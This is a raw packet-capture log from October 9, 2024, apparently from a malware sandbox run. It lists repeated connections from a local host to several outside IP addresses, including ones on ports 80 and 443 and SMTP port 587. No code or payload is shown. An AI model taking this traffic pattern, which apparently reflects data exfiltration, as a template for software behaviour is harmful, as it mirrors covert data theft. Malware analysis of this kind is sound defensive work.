                                                                                      Oct 9, 2024 12:13:31.602365971 CEST49721443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:31.602660894 CEST49721443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:31.602679014 CEST44349721188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:31.649791956 CEST4972080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:32.065793991 CEST44349721188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.067692041 CEST49721443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:32.067728043 CEST44349721188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.210654974 CEST44349721188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.210932016 CEST44349721188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.211143970 CEST49721443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:32.211927891 CEST49721443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:32.217097998 CEST4972080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:32.217778921 CEST4972280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:32.223651886 CEST8049722193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.223669052 CEST8049720193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.223793030 CEST4972080192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:32.223854065 CEST4972280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:32.223947048 CEST4972280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:32.229513884 CEST8049722193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.871831894 CEST8049722193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.877229929 CEST49723443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:32.877278090 CEST44349723188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.877438068 CEST49723443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:32.906327963 CEST49723443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:32.906363010 CEST44349723188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:32.914661884 CEST4972280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:33.380486012 CEST44349723188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.382570028 CEST49723443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:33.382585049 CEST44349723188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.512903929 CEST44349723188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.513051987 CEST44349723188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.513153076 CEST49723443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:33.513876915 CEST49723443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:33.557174921 CEST4972280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:33.563704014 CEST8049722193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.563771009 CEST4972280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:33.564990997 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:33.565028906 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:33.565227985 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:33.565753937 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:33.565763950 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.208857059 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.208970070 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:34.210846901 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:34.210855007 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.211188078 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.212862015 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:34.255604029 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.455813885 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.455914974 CEST44349724149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:34.455970049 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:34.460144043 CEST49724443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:40.524528027 CEST4971280192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:40.762310982 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:40.767457008 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:40.767695904 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:41.346596956 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:41.346930027 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:41.351799965 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:41.918139935 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:41.961530924 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.047112942 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.047276020 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.052140951 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.234929085 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.235419989 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.240324020 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.424652100 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.424680948 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.424694061 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.424806118 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.427808046 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.432591915 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.615026951 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.618475914 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.623246908 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.805965900 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.807179928 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:42.811985970 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.994595051 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:42.995315075 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.000169039 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.264723063 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.265186071 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.270045996 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.452378988 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.452639103 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.457638979 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.640074968 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.640321016 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.645200014 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.827677965 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.829313993 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.829690933 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.829838037 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.829936981 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:43.834127903 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.834517002 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.834602118 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.834619999 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.834732056 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.968188047 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:43.973093987 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:43.973181963 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:43.973371983 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:43.978256941 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:44.336966038 CEST58749725185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:13:44.383383036 CEST49725587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:13:44.612292051 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:44.616225958 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:44.622734070 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:44.803423882 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:44.852153063 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:45.241498947 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.241544962 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.241612911 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.258312941 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.258342028 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.714294910 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.714432001 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.716114044 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.716125965 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.716403961 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.765633106 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.807399988 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.870927095 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.871028900 CEST44349727188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:45.871078014 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.874273062 CEST49727443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:45.882730961 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:45.887648106 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.069756985 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.072204113 CEST49728443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:46.072243929 CEST44349728188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.072410107 CEST49728443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:46.072725058 CEST49728443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:46.072736025 CEST44349728188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.117763996 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:46.532345057 CEST44349728188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.537401915 CEST49728443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:46.537429094 CEST44349728188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.686856031 CEST44349728188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.686980009 CEST44349728188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.687078953 CEST49728443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:46.692629099 CEST49728443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:46.809076071 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:46.810311079 CEST4972980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:46.814423084 CEST8049726193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.814492941 CEST4972680192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:46.815197945 CEST8049729193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:46.815274000 CEST4972980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:46.815393925 CEST4972980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:46.820161104 CEST8049729193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:47.460211039 CEST8049729193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:47.461658001 CEST49730443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:47.461690903 CEST44349730188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:47.461754084 CEST49730443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:47.462049961 CEST49730443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:47.462064981 CEST44349730188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:47.508378029 CEST4972980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:47.919008017 CEST44349730188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:47.921063900 CEST49730443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:47.921083927 CEST44349730188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.066740990 CEST44349730188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.066891909 CEST44349730188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.066936970 CEST49730443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:48.067707062 CEST49730443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:48.077450037 CEST4972980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:48.078788996 CEST4973180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:48.082587004 CEST8049729193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.082647085 CEST4972980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:48.083587885 CEST8049731193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.083652973 CEST4973180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:48.083816051 CEST4973180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:48.088561058 CEST8049731193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.719733953 CEST8049731193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.721133947 CEST49732443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:48.721180916 CEST44349732188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.721252918 CEST49732443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:48.721539974 CEST49732443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:48.721550941 CEST44349732188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:48.774029016 CEST4973180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:49.344577074 CEST44349732188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:49.356781006 CEST49732443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:49.356810093 CEST44349732188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:49.478754044 CEST44349732188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:49.478861094 CEST44349732188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:49.478934050 CEST49732443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:49.498660088 CEST49732443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:49.552473068 CEST4973180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:49.554466963 CEST4973380192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:49.557792902 CEST8049731193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:49.557889938 CEST4973180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:49.559396982 CEST8049733193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:49.559729099 CEST4973380192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:49.559729099 CEST4973380192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:49.565084934 CEST8049733193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.186192036 CEST8049733193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.187640905 CEST49734443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:50.187685013 CEST44349734188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.187917948 CEST49734443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:50.188010931 CEST49734443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:50.188020945 CEST44349734188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.227142096 CEST4973380192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:50.688990116 CEST44349734188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.690979958 CEST49734443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:50.691015005 CEST44349734188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.827053070 CEST44349734188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.827138901 CEST44349734188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.827209949 CEST49734443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:50.827826977 CEST49734443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:50.831310034 CEST4973380192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:50.832818031 CEST4973580192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:50.837090015 CEST8049733193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.837150097 CEST4973380192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:50.838295937 CEST8049735193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:50.838510990 CEST4973580192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:50.838510990 CEST4973580192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:50.843756914 CEST8049735193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:51.493196964 CEST8049735193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:51.494898081 CEST49736443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:51.494951963 CEST44349736188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:51.495035887 CEST49736443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:51.495485067 CEST49736443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:51.495496988 CEST44349736188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:51.539675951 CEST4973580192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:51.982537985 CEST44349736188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:51.986588001 CEST49736443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:51.986619949 CEST44349736188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.122119904 CEST44349736188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.122219086 CEST44349736188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.122291088 CEST49736443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:52.122875929 CEST49736443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:52.127866030 CEST4973780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:52.132998943 CEST8049737193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.133095026 CEST4973780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:52.133239985 CEST4973780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:52.138173103 CEST8049737193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.811613083 CEST8049737193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.813047886 CEST49738443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:52.813107014 CEST44349738188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.813200951 CEST49738443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:52.813534021 CEST49738443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:52.813561916 CEST44349738188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:52.852148056 CEST4973780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:53.341936111 CEST44349738188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:53.343688011 CEST49738443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:53.343705893 CEST44349738188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:53.490592957 CEST44349738188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:53.490854979 CEST44349738188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:53.490914106 CEST49738443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:53.491424084 CEST49738443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:53.497946978 CEST4973780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:53.498929024 CEST4973980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:53.503819942 CEST8049737193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:53.503902912 CEST4973780192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:53.504159927 CEST8049739193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:53.504232883 CEST4973980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:53.504349947 CEST4973980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:53.509728909 CEST8049739193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:54.140089035 CEST8049739193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:54.141642094 CEST49740443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:54.141679049 CEST44349740188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:54.141789913 CEST49740443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:54.142424107 CEST49740443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:54.142438889 CEST44349740188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:54.180289030 CEST4973980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:54.867887020 CEST44349740188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:54.870028019 CEST49740443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:54.870057106 CEST44349740188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.013942003 CEST44349740188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.014051914 CEST44349740188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.014122009 CEST49740443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:55.020849943 CEST49740443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:55.028520107 CEST4973980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:55.029448032 CEST4974180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:55.034034967 CEST8049739193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.034096003 CEST4973980192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:55.034374952 CEST8049741193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.034442902 CEST4974180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:55.034521103 CEST4974180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:55.039760113 CEST8049741193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.685668945 CEST8049741193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.692152023 CEST49743443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:55.692200899 CEST44349743188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.692265987 CEST49743443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:55.692574024 CEST49743443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:55.692589045 CEST44349743188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:55.727416039 CEST4974180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:56.152355909 CEST44349743188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.154531956 CEST49743443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:56.154551983 CEST44349743188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.299500942 CEST44349743188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.299696922 CEST44349743188.114.97.3192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.299750090 CEST49743443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:56.300318956 CEST49743443192.168.2.8188.114.97.3
                                                                                      Oct 9, 2024 12:13:56.336148024 CEST4974180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:56.337075949 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:56.337126017 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.337183952 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:56.337848902 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:56.337862015 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.341789007 CEST8049741193.122.6.168192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.341860056 CEST4974180192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:13:56.999784946 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:56.999903917 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:57.012499094 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:57.012516975 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:57.012758017 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:57.026375055 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:57.071402073 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:57.399499893 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:57.399561882 CEST44349744149.154.167.220192.168.2.8
                                                                                      Oct 9, 2024 12:13:57.399609089 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:13:57.402359009 CEST49744443192.168.2.8149.154.167.220
                                                                                      Oct 9, 2024 12:14:03.444891930 CEST4973580192.168.2.8193.122.6.168
                                                                                      Oct 9, 2024 12:14:03.661223888 CEST49745587192.168.2.8185.230.214.164
                                                                                      Oct 9, 2024 12:14:03.666105986 CEST58749745185.230.214.164192.168.2.8
                                                                                      Oct 9, 2024 12:14:03.666218042 CEST49745587192.168.2.8185.230.214.164
